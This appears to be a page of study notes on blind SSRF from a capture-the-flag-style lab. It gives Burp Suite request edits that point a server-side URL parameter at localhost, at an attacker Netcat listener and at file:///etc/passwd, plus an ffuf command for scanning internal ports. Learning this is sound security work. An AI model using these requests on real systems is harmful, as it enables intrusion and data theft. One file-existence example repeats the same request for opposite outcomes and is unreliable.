BLIND SSRF

in a blind SSRF, the response does not contain the HTML response of the coerced request. the response will sometimes show an error. to verify whether there is really an SSRF vulnerability, re-run the coerced request and catch the response with Netcat.

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1/index.php&date=2024-01-02
   - SSRF can be validated if the URL can be changed to point to another URL;
     if the response reports no error, then there is an SSRF vulnerability
      - changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
        will test whether the web application responds w/o error
      - this method also tests whether the SSRF vulnerability is blind or something else
 Response
  ...
  Date is unavailable. Choose a different date!
  
#verifying blind SSRF with Nectcat
root@oco:~$ nc -nlvp 8080

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://{attackerIP:port}&date=2024-01-02
   - SSRF can be validated if the URL can be changed to point to another URL;
     if the response reports no error, then there is an SSRF vulnerability
      - changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
        will test whether the web application responds w/o error
      - this method also tests whether the SSRF vulnerability is blind or something else

root@oco:~$ ...Netcat connection  
 connect to {attackerIP} from (UNKNOWN) [172.17.0.2] 32928
 GET /index.php HTTP/1.1
 Host: 172.17.0.1:8000
 Accept: */*

EXPLOITATION

exploiting blind SSRF depends on the web application's behavior and response.

#open/close port enumeration
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

#identify closed ports
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1:81&date=2024-01-02
   - the error msgs on closed ports is used by ffuf to identify open ports
      - "Something went wrong..."
          - the error msgs between open/closed ports will be different

#identify open ports
BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1:80&date=2024-01-02
   - change the port number to determine which ports are closed
      - the error msgs on closed ports is used by ffuf to identify open ports
         - "Date is unavailable. Choose a different date..."
             - the error msgs between open/closed ports will be different

#AUTOMATED
root@oco:~$ seq 1 10000 > ports.txt
root@oco:~$ ffuf -w ./ports.txt -u http://{targetSite:port}/{targetPage}.{tld} -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Something went wrong"
 * -fr means filter regexp
 * 80   [Status: 200, Size: 8285, Words: 2151, Lines: 158, Duration: 6095ms]
   3306 [Status: 200, Size: 45, Words: 7, Lines: 1, Duration: 14ms]
   8000 [Status: 200, Size: 37, Words: 1, Lines: 1, Duration: 51ms]
             
             
#identifying existing files on the system
#again the error msgs will be different between existing and non-existing files

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=file:///etc/passwd&date=2024-01-02
 Response
  ...
  Date is unavailable. Choose a different date
   - this means that the file exist

BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=file:///etc/passwd&date=2024-01-02
 Response
  ...
  Something went wrong!
   - this means that the file DOES'NT exist
  

#LFI: bypassing URL restrictions or access controls
BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=file%3A%2F%2F%2Fetc%2Fpasswd&date=2024-01-02

Previous01.DISCOVERY NextENUMERATION

Last updated 1 year ago